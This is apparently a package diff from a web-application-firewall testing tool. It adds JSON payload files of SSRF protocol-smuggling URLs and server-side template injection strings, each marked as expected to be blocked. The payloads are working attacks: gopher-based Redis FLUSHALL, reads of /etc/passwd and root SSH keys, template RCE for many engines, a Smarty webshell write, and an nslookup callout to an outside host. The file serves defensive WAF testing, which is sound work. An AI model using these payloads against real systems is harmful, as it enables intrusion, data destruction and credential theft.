@waftester/cli 2.8.0

package/payloads/community/ssrf/protocol-smuggling.json

@@ -0,0 +1,350 @@
+[
+  {
+      "id": "SSRF-PROTO-001",
+      "payload": "gopher://localhost:25/_MAIL%20FROM:<admin@example.com>",
+      "tags": [
+        "gopher",
+        "smtp",
+        "quick",
+        "critical"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Gopher protocol SMTP smuggling",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-002",
+      "payload": "gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a",
+      "tags": [
+        "gopher",
+        "redis",
+        "quick",
+        "critical"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Gopher protocol Redis FLUSHALL command",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-003",
+      "payload": "gopher://127.0.0.1:11211/_set%20test%200%200%205%0d%0ahello%0d%0a",
+      "tags": [
+        "gopher",
+        "memcached",
+        "quick"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Gopher protocol Memcached injection",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-004",
+      "payload": "dict://localhost:11211/stat",
+      "tags": [
+        "dict",
+        "memcached",
+        "quick"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "DICT protocol Memcached stats",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-005",
+      "payload": "dict://127.0.0.1:6379/info",
+      "tags": [
+        "dict",
+        "redis",
+        "quick"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "DICT protocol Redis info",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-006",
+      "payload": "file:///etc/passwd",
+      "tags": [
+        "file",
+        "local-file",
+        "quick",
+        "critical"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "File protocol local file read (Unix)",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-007",
+      "payload": "file://c:/windows/win.ini",
+      "tags": [
+        "file",
+        "local-file",
+        "windows"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "File protocol local file read (Windows)",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-008",
+      "payload": "file:///proc/self/environ",
+      "tags": [
+        "file",
+        "proc",
+        "quick"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "File protocol proc filesystem access",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-009",
+      "payload": "ldap://localhost:389/dc=example,dc=com?cn,mail?sub?(objectClass=*)",
+      "tags": [
+        "ldap",
+        "quick"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "LDAP protocol query",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-010",
+      "payload": "ldaps://127.0.0.1:636/",
+      "tags": [
+        "ldap",
+        "ssl"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "LDAPS (secure LDAP) protocol",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-011",
+      "payload": "tftp://localhost:69/config.txt",
+      "tags": [
+        "tftp"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "TFTP protocol file retrieval",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-012",
+      "payload": "ftp://anonymous:password@localhost:21/",
+      "tags": [
+        "ftp",
+        "quick"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "FTP protocol with credentials",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-013",
+      "payload": "sftp://127.0.0.1:22/root/.ssh/id_rsa",
+      "tags": [
+        "sftp",
+        "ssh-keys"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "SFTP protocol SSH key access",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-014",
+      "payload": "jar:http://localhost:8080/app.jar!/META-INF/MANIFEST.MF",
+      "tags": [
+        "jar",
+        "java"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "JAR protocol Java archive access",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-015",
+      "payload": "netdoc:///etc/hosts",
+      "tags": [
+        "netdoc",
+        "java"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Netdoc protocol (Java-specific)",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-016",
+      "payload": "gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00",
+      "tags": [
+        "gopher",
+        "mysql",
+        "handshake"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Gopher protocol MySQL handshake marker",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-017",
+      "payload": "gopher://127.0.0.1:5432/_",
+      "tags": [
+        "gopher",
+        "postgresql"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Gopher protocol PostgreSQL connection attempt",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-018",
+      "payload": "gopher://127.0.0.1:27017/_",
+      "tags": [
+        "gopher",
+        "mongodb"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Gopher protocol MongoDB connection attempt",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-019",
+      "payload": "gopher://127.0.0.1:9200/_GET%20/_cluster/health",
+      "tags": [
+        "gopher",
+        "elasticsearch"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Gopher protocol Elasticsearch query",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-020",
+      "payload": "data:text/html,<script>alert('XSS')</script>",
+      "tags": [
+        "data-uri",
+        "xss"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Data URI with embedded script",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-021",
+      "payload": "data:application/x-sh;base64,Y2F0IC9ldGMvcGFzc3dk",
+      "tags": [
+        "data-uri",
+        "base64",
+        "shell"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Data URI with base64-encoded shell command",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-022",
+      "payload": "php://filter/convert.base64-encode/resource=/etc/passwd",
+      "tags": [
+        "php-wrapper",
+        "lfi"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "PHP filter wrapper for LFI",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-023",
+      "payload": "expect://id",
+      "tags": [
+        "php-wrapper",
+        "rce"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "PHP expect wrapper for command execution",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-024",
+      "payload": "zip://archive.zip#shell.php",
+      "tags": [
+        "zip-wrapper",
+        "php"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "ZIP wrapper file access",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-025",
+      "payload": "phar://archive.phar/malicious.php",
+      "tags": [
+        "phar-wrapper",
+        "php"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "PHAR wrapper archive access",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-026",
+      "payload": "gopher://localhost:9000/_GET%20/status%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0a",
+      "tags": [
+        "gopher",
+        "http-smuggling"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Gopher protocol HTTP request smuggling",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-027",
+      "payload": "file:///dev/null",
+      "tags": [
+        "file",
+        "device"
+    ],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "File protocol device access",
+      "category": "SSRF"
+  },
+  {
+      "id": "SSRF-PROTO-028",
+      "payload": "dict://localhost:8080/",
+      "tags": [
+        "dict",
+        "http-alt-port"
+    ],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "DICT protocol to HTTP alternative port",
+      "category": "SSRF"
+  }
+]

package/payloads/community/ssti/multi-language-templates.json

@@ -0,0 +1,191 @@
+[
+    {
+      "id": "ssti-twig-001",
+      "payload": "{{['id']|filter('system')}}",
+      "tags": ["ssti", "twig", "php", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Twig RCE via filter callback",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-twig-002",
+      "payload": "{{[0]|reduce('system','id')}}",
+      "tags": ["ssti", "twig", "php", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Twig RCE via reduce callback",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-twig-003",
+      "payload": "{{_self.env.registerUndefinedFilterCallback(\"exec\")}}{{_self.env.getFilter(\"id\")}}",
+      "tags": ["ssti", "twig", "php", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Twig RCE via undefined filter callback (older versions)",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-twig-004",
+      "payload": "{{'/etc/passwd'|file_excerpt(1,30)}}",
+      "tags": ["ssti", "twig", "php", "lfi"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Twig file read via file_excerpt filter",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-blade-001",
+      "payload": "{{passthru(implode(null,array_map(chr(99).chr(104).chr(114),[105,100])))}}",
+      "tags": ["ssti", "blade", "laravel", "php", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Laravel Blade RCE via chr obfuscation",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-smarty-001",
+      "payload": "{php}echo `id`;{/php}",
+      "tags": ["ssti", "smarty", "php", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Smarty PHP tag RCE (older versions)",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-smarty-002",
+      "payload": "{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,\"<?php passthru($_GET['c']); ?>\",self::clearConfig())}",
+      "tags": ["ssti", "smarty", "php", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Smarty write webshell to file",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-latte-001",
+      "payload": "{php system('nslookup oastify.com')}",
+      "tags": ["ssti", "latte", "php", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Latte template RCE",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-freemarker-001",
+      "payload": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"id\")}",
+      "tags": ["ssti", "freemarker", "java", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Freemarker RCE via Execute utility",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-freemarker-002",
+      "payload": "[#assign ex='freemarker.template.utility.Execute'?new()]${ex('id')}",
+      "tags": ["ssti", "freemarker", "java", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Freemarker RCE alternate syntax",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-freemarker-003",
+      "payload": "${\"freemarker.template.utility.Execute\"?new()(\"id\")}",
+      "tags": ["ssti", "freemarker", "java", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Freemarker RCE compact syntax",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-velocity-001",
+      "payload": "#set($x='')##$x.class.forName('java.lang.Runtime').getRuntime().exec('id')",
+      "tags": ["ssti", "velocity", "java", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Velocity RCE via Runtime class",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-velocity-002",
+      "payload": "#set($s='')#set($rt=$s.class.forName('java.lang.Runtime'))#set($chr=$s.class.forName('java.lang.Character'))#set($str=$s.class.forName('java.lang.String'))#set($ex=$rt.getRuntime().exec('id'))$ex.waitFor()#set($out=$ex.getInputStream())#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end",
+      "tags": ["ssti", "velocity", "java", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Velocity RCE with output",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-pug-001",
+      "payload": "#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}",
+      "tags": ["ssti", "pug", "jade", "nodejs", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Pug/Jade RCE via process.mainModule",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-pug-002",
+      "payload": "- global.process.mainModule.require('child_process').execSync('id').toString()",
+      "tags": ["ssti", "pug", "jade", "nodejs", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Pug RCE via global.process",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-ejs-001",
+      "payload": "<%- global.process.mainModule.require('child_process').execSync('id').toString() %>",
+      "tags": ["ssti", "ejs", "nodejs", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "EJS RCE via global.process",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-nunjucks-001",
+      "payload": "{{range.constructor('return global.process.mainModule.require(\"child_process\").execSync(\"id\").toString()')()}}",
+      "tags": ["ssti", "nunjucks", "nodejs", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Nunjucks RCE via constructor trick",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-handlebars-001",
+      "payload": "{{#with \"s\" as |string|}}\n  {{#with \"e\"}}\n    {{#with split as |conslist|}}\n      {{this.pop}}\n      {{this.push (lookup string.sub \"constructor\")}}\n      {{this.pop}}\n      {{#with string.split as |codelist|}}\n        {{this.pop}}\n        {{this.push \"return require('child_process').execSync('id');\"}}\n        {{this.pop}}\n        {{#each conslist}}\n          {{#with (string.sub.apply 0 codelist)}}\n            {{this}}\n          {{/with}}\n        {{/each}}\n      {{/with}}\n    {{/with}}\n  {{/with}}\n{{/with}}",
+      "tags": ["ssti", "handlebars", "nodejs", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Handlebars RCE via prototype chain",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-groovy-001",
+      "payload": "${'id'.execute().text}",
+      "tags": ["ssti", "groovy", "java", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Groovy GString RCE",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-spel-001",
+      "payload": "${T(java.lang.Runtime).getRuntime().exec('id')}",
+      "tags": ["ssti", "spel", "spring", "java", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Spring Expression Language RCE",
+      "category": "Injection"
+    },
+    {
+      "id": "ssti-jinjava-001",
+      "payload": "{{'a]'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\\\"new java.lang.String('id')\\\"}}",
+      "tags": ["ssti", "jinjava", "java", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Jinjava (HubSpot) RCE via JavaScript engine",
+      "category": "Injection"
+    }
+]